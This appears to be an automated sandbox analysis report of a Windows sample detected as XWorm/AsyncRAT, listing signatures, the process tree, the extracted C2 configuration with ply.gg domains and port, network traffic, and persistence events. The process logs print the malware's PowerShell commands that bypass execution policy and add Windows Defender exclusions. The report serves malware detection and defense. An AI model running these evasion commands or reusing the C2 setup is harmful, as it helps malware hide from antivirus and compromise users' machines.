
Windows Analysis Report
Zvas34nq1T.exe

Overview

General Information

Sample name: Zvas34nq1T.exe (renamed because the original name is a hash value)
Original sample name: 95e1104df5d9080402316949de1137c886f9d53d884cee12d10af499f41d5ac1.exe
Analysis ID: 1543338
MD5: 3830ea8c8b7a7730a6446ca3c8a61180
SHA1: cf9e202a5d5139e7e5ee375653397f0dbd5b11a6
SHA256: 95e1104df5d9080402316949de1137c886f9d53d884cee12d10af499f41d5ac1
Tags: exe, user-Chainskilabs
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Zvas34nq1T.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\Zvas34nq1T.exe" MD5: 3830EA8C8B7A7730A6446CA3C8A61180)
    • powershell.exe (PID: 7368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorer.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: 3830EA8C8B7A7730A6446CA3C8A61180)
  • explorer.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: 3830EA8C8B7A7730A6446CA3C8A61180)
  • cleanup
{"C2 url": ["127.0.0.1", "develop-versions.gl.at.ply.gg", "develop-versions.gl.at.ply.gg:65059", "have-lucia.gl.at.ply.gg"], "Port": "65059", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Yara matches (Source / Rule / Description / Author / Strings):

Source: Zvas34nq1T.exe, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: Zvas34nq1T.exe, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0x7953:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x79f0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7b05:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x77c5:$cnc4: POST / HTTP/1.1
Source: C:\Users\user\AppData\Roaming\explorer.exe, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\explorer.exe, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0x7953:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x79f0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7b05:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x77c5:$cnc4: POST / HTTP/1.1
Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0x7753:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x77f0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7905:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x75c5:$cnc4: POST / HTTP/1.1
Source: Process Memory Space: Zvas34nq1T.exe PID: 7276, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Author: Joe Security
Source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen, Strings:
  • 0x7953:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x79f0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7b05:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x77c5:$cnc4: POST / HTTP/1.1

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Users\user\Desktop\Zvas34nq1T.exe, ProcessId: 7276, TargetFilename: C:\Users\user\AppData\Roaming\explorer.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zvas34nq1T.exe", ParentImage: C:\Users\user\Desktop\Zvas34nq1T.exe, ParentProcessId: 7276, ParentProcessName: Zvas34nq1T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', ProcessId: 7368, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali, Data: Command: "C:\Users\user\AppData\Roaming\explorer.exe", CommandLine: "C:\Users\user\AppData\Roaming\explorer.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Roaming\explorer.exe", ProcessId: 5328, ProcessName: explorer.exe
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zvas34nq1T.exe", ParentImage: C:\Users\user\Desktop\Zvas34nq1T.exe, ParentProcessId: 7276, ParentProcessName: Zvas34nq1T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', ProcessId: 7368, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\explorer.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Zvas34nq1T.exe, ProcessId: 7276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zvas34nq1T.exe", ParentImage: C:\Users\user\Desktop\Zvas34nq1T.exe, ParentProcessId: 7276, ParentProcessName: Zvas34nq1T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', ProcessId: 7368, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\Zvas34nq1T.exe, ProcessId: 7276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zvas34nq1T.exe", ParentImage: C:\Users\user\Desktop\Zvas34nq1T.exe, ParentProcessId: 7276, ParentProcessName: Zvas34nq1T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', ProcessId: 7368, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: Zvas34nq1T.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\explorer.exe, Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: Zvas34nq1T.exe, Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "develop-versions.gl.at.ply.gg", "develop-versions.gl.at.ply.gg:65059", "have-lucia.gl.at.ply.gg"], "Port": "65059", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Roaming\explorer.exe, ReversingLabs: Detection: 89%
Source: Zvas34nq1T.exe, ReversingLabs: Detection: 89%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\explorer.exe, Joe Sandbox ML: detected
Source: Zvas34nq1T.exe, Joe Sandbox ML: detected
Source: Zvas34nq1T.exe, String decryptor: 127.0.0.1,develop-versions.gl.at.ply.gg,develop-versions.gl.at.ply.gg:65059,have-lucia.gl.at.ply.gg
Source: Zvas34nq1T.exe, String decryptor: 65059
Source: Zvas34nq1T.exe, String decryptor: <123456789>
Source: Zvas34nq1T.exe, String decryptor: <Xwormmm>
Source: Zvas34nq1T.exe, String decryptor: jjsploit
Source: Zvas34nq1T.exe, String decryptor: USB.exe
Source: Zvas34nq1T.exe, String decryptor: %AppData%
Source: Zvas34nq1T.exe, String decryptor: explorer.exe
Source: Zvas34nq1T.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Zvas34nq1T.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Malware configuration extractor, URLs: 127.0.0.1
Source: Malware configuration extractor, URLs: develop-versions.gl.at.ply.gg
Source: Malware configuration extractor, URLs: develop-versions.gl.at.ply.gg:65059
Source: Malware configuration extractor, URLs: have-lucia.gl.at.ply.gg
Source: global traffic, TCP traffic: 192.168.2.4:49789 -> 147.185.221.21:65059
Source: global traffic, TCP traffic: 192.168.2.4:49928 -> 147.185.221.23:65059
Source: Joe Sandbox View, IP Address: 147.185.221.21
Source: Joe Sandbox View, IP Address: 147.185.221.23
Source: Joe Sandbox View, ASN Name: SALSGIVERUS
Source: Joe Sandbox View, ASN Name: SALSGIVERUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: develop-versions.gl.at.ply.gg
Source: global traffic, DNS traffic detected: DNS query: have-lucia.gl.at.ply.gg
Source: powershell.exe, 00000001.00000002.1781097013.00000150472B2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000004.00000002.1895371135.0000016078CD6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micros4
Source: powershell.exe, 00000001.00000002.1773649556.000001503EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1877214143.0000016070523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2019038744.0000028490073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1755806750.000001502EF59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160606DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Zvas34nq1T.exe, 00000000.00000002.2947487566.0000000003171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1755806750.000001502ED31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160604B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BD31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1755806750.000001502EF59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160606DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1755806750.000001502ED31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160604B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BD31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1773649556.000001503EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1877214143.0000016070523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2019038744.0000028490073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process information set: 01 00 00 00

System Summary

Source: Zvas34nq1T.exe, type: SAMPLE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED, Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Code function: 0_2_00007FFD9B890E69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_00007FFD9B9530E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 4_2_00007FFD9B9739D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00007FFD9B8853F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_00007FFD9B8A53F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_00007FFD9B9730E9
Source: C:\Users\user\AppData\Roaming\explorer.exe, Code function: 13_2_00007FFD9B880E69
Source: C:\Users\user\AppData\Roaming\explorer.exe, Code function: 14_2_00007FFD9B890E69
Source: Zvas34nq1T.exe, 00000000.00000000.1682816703.0000000000E1C000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameXClient.exe4 vs Zvas34nq1T.exe
Source: Zvas34nq1T.exe, Binary or memory string: OriginalFilenameXClient.exe4 vs Zvas34nq1T.exe
Source: Zvas34nq1T.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Zvas34nq1T.exe, type: SAMPLE, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Zvas34nq1T.exe, Helper.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: Zvas34nq1T.exe, Helper.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: Zvas34nq1T.exe, AlgorithmAES.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: explorer.exe.0.dr, Helper.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: explorer.exe.0.dr, Helper.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: explorer.exe.0.dr, AlgorithmAES.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: Zvas34nq1T.exe, ClientSocket.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Zvas34nq1T.exe, ClientSocket.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: explorer.exe.0.dr, ClientSocket.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: explorer.exe.0.dr, ClientSocket.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine, Classification label: mal100.troj.evad.winEXE@15/20@2/3
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, File created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Mutant created: \Sessions\1\BaseNamedObjects\F3euhgbNmjl7pCCb
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02jzship.30p.ps1
Source: unknown, Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: unknown, Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: Zvas34nq1T.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Zvas34nq1T.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Zvas34nq1T.exe, ReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, File read: C:\Users\user\Desktop\Zvas34nq1T.exe
Source: unknown, Process created: C:\Users\user\Desktop\Zvas34nq1T.exe "C:\Users\user\Desktop\Zvas34nq1T.exe"
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
Source: unknown, Process created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'
Source: C:\Users\user\Desktop\Zvas34nq1T.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe'
